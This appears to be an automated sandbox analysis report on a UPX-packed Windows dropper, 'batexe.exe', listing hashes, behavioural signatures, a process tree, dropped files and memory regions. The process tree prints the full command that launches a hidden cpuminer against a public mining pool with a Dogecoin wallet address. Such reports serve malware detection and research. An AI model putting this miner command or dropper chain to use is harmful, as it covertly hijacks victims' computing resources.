Analysis

  • max time kernel
    294s
  • max time network
    298s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    18/02/2024, 17:59

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3664
    • C:\Users\Admin\AppData\Local\Temp\5F85.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\5F85.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5F85.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3676
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\61F6.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:4188

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\5F85.tmp\b2e.exe

          Filesize

          1.0MB

          MD5

          d88c7103a3f78e4c90db7a6562ab7c1c

          SHA1

          d29e1ac1d74851e93c759bd5fd440daa0c991645

          SHA256

          93a732ba4b9d99ef37fff8fc6a5f36b0deae6ba0a8a601258e6b33d4e2c65f67

          SHA512

          6e9926120264694b872ac908069353464f0f9488f12edc89c4652d38dbe532d64843816feed0c3104780f6ff25a0af91079777c0392d4f3529a786ef7f35af24

        • C:\Users\Admin\AppData\Local\Temp\5F85.tmp\b2e.exe

          Filesize

          420KB

          MD5

          532133e4aed0fb72fda2bb470a6bbe03

          SHA1

          6935da90c93f9f00abe9b8f3c6a40cb0cbc4ade0

          SHA256

          760ec82a41e9396dc29f4b9123130006c7f75bafa0a6386e2ceaf3268ae0e48f

          SHA512

          a37f0f820d3a8d0c2060e3f177d40507161c462c90a3136440da60d073db0eeae15bd84ff1d1eeafb32055a1cab744e474e50115a2702da8f1c2b9c8ddf98dc4

        • C:\Users\Admin\AppData\Local\Temp\5F85.tmp\b2e.exe

          Filesize

          902KB

          MD5

          ca87d41e46a710fb275ae6e685b94ec1

          SHA1

          90144e8a3424a0df96c16e6d336446a235dcabba

          SHA256

          7b9060515c4c180978998f2fe0fe79b35069806089271b51ed6bab4dbb242227

          SHA512

          ccd295fee8ac88f29d445df1ef751f0681fcdb62b28bbbad5ab8c958fde341f19ef318795991a23567c541542242936cdab2466f9c7a1ba233a5b034b77f1736

        • C:\Users\Admin\AppData\Local\Temp\61F6.tmp\batchfile.bat

          Filesize

          136B

          MD5

          8ea7ac72a10251ecfb42ef4a88bd330a

          SHA1

          c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

          SHA256

          65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

          SHA512

          a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          780KB

          MD5

          20c093bbe71287d9419a9b50e9f47b30

          SHA1

          f6a51b9edce22691e4da815b0da557dfecc645e1

          SHA256

          6dbbe9753c44bff393ce0afd12edc39a56dddcce429ad912bd18bbe666f7a186

          SHA512

          95c416df78643560ada83a3b4852b2981422e359eb2e5a8ede6795cadf15012049fddfd40a5e782a67d169ee320381c312715a9d19cecb9e0333fd649688f805

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          1007KB

          MD5

          8496c2d103458b1bc337180c8adc9db3

          SHA1

          8e7896631d72ca3973649dc9812f66dcf89110da

          SHA256

          728645700cfed449a8971fe51676dc7b14d90714c9fbc80701914aeac7a47cdd

          SHA512

          e3b575a2fc44cb817dfe721397cf5e08b835c35c625c14a51ce7c1598e02a5e45abb284f647870255fc32f67e1d028bd0e98dfdf458ce9602bb40bf249274920

        • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          836KB

          MD5

          aeab40ed9a8e627ea7cefc1f5cf9bf7a

          SHA1

          5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

          SHA256

          218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

          SHA512

          c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

        • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          663KB

          MD5

          bb4aafb76813bc871a26fe9ff22ffdc8

          SHA1

          4b2d7ddd6d8873e9c37892b38b390d568638106e

          SHA256

          eabe43fe7c8cef50d2918d59cfe2e4dea8e758922dbed860bf3a75f670b7c94c

          SHA512

          40b1e94dd8a537726a53751d1661385f3c78d94a5e062371227ab3b019a02988b8eaf62247dc82f25cc74b262287f7f0e12925b0d06faf0ec3b6983d6f8a1091

        • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          835KB

          MD5

          691cb866a695eb4f9cebc0fdf8885e7c

          SHA1

          cd01e3cbeff8422b790c27fcd65e4b0adfd16065

          SHA256

          273336d8636ffa9cf57bad6c13c766c7f7d735994a5b06e48605b605d8484102

          SHA512

          ef7c9d8583fd7dd6791f021807f603d4687dc383476039c42da3001fb9ce0bd4cd00302f3d935d27888df45c969f4f9a90398bc418bd57344ec6f2e6bc226e50

        • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          793KB

          MD5

          21c5649ef338c503ff79e9ae4ee86abc

          SHA1

          65df8f34980445ad55ba2c9131f34d3d5a652913

          SHA256

          41df79fec6c444ca9d553d8b97bf9a185c18f50de63a16f4b02b7ae8b267b2fa

          SHA512

          7f406d8b3297dcd89fd3aaa8efffa651c6167bf3d0f5f106151c21a184e32cba05cfeef3871e9d946e1dc94a179b6989c89db1b82c77ca1421f06da4745fd2b6

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          797KB

          MD5

          1c2601bc76fd4c7b60ae7c2b68e2bbea

          SHA1

          2b9f0a8d0d7871a4e3f6f71dd80a81f0f7def6fd

          SHA256

          c14eb327e86e0267da53c7a8020645d0a14120052be29fc78abbb5a52560aa71

          SHA512

          ef5fcc05c0c9907c16d7f740e3b9fc0981643a435ddba107f51762c1397d170a9c3a81bae025c047bd5f3ad3ec05ef897decc1cf3706090421479b6a92fb7ec3

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          742KB

          MD5

          45371e62690cc190ad91cefdbf810e7d

          SHA1

          c235df65524bdc3ffbb356406a152e56d2b61cca

          SHA256

          7dfa5fb00464dbc9521a01b71c93c5ea6cada7a586ed7172dc74167ef18d89ad

          SHA512

          fc75239a8c68ff2b5cc226d83edb90785e70c6f2be438fbd123b474206fea6984680237cd33ead7b5d3a831f6219bb43b529ad0822de7d8be6d61deab23faeed

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          678KB

          MD5

          2f92ed2da13c1dfa8f049e4df24cc18c

          SHA1

          97b74e4eb7e0b8742a6828e95c602f68d25ed42d

          SHA256

          ad0daf498a431ce6f8b0b7697032ce7399b96075aa2307517fdfb7cac5f78c92

          SHA512

          f18e6dbfd08cf63d7575c58b33f1b46bd448896100d2233d413f97f4fd8ec2d91ac8e62d1db7c1cfcb4956430ae0dcf9bcbef0087d93d8dd54c9cfa467a11e97

        • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

          Filesize

          606KB

          MD5

          585efec1bc1d4d916a4402c9875dff75

          SHA1

          d209613666ccac9d0ddab29a3bc59aa00a0968fa

          SHA256

          2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

          SHA512

          b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

        • memory/3664-8-0x0000000000400000-0x000000000393A000-memory.dmp

          Filesize

          53.2MB

        • memory/3676-53-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB

        • memory/3676-9-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB

        • memory/4188-46-0x0000000054CD0000-0x0000000054D68000-memory.dmp

          Filesize

          608KB

        • memory/4188-44-0x0000000061440000-0x000000006156B000-memory.dmp

          Filesize

          1.2MB

        • memory/4188-43-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4188-47-0x00000000010A0000-0x0000000002955000-memory.dmp

          Filesize

          24.7MB

        • memory/4188-48-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4188-45-0x0000000070800000-0x00000000708BC000-memory.dmp

          Filesize

          752KB

        • memory/4188-54-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4188-64-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4188-69-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4188-79-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4188-82-0x0000000054CD0000-0x0000000054D68000-memory.dmp

          Filesize

          608KB

        • memory/4188-84-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4188-89-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4188-94-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4188-99-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4188-104-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB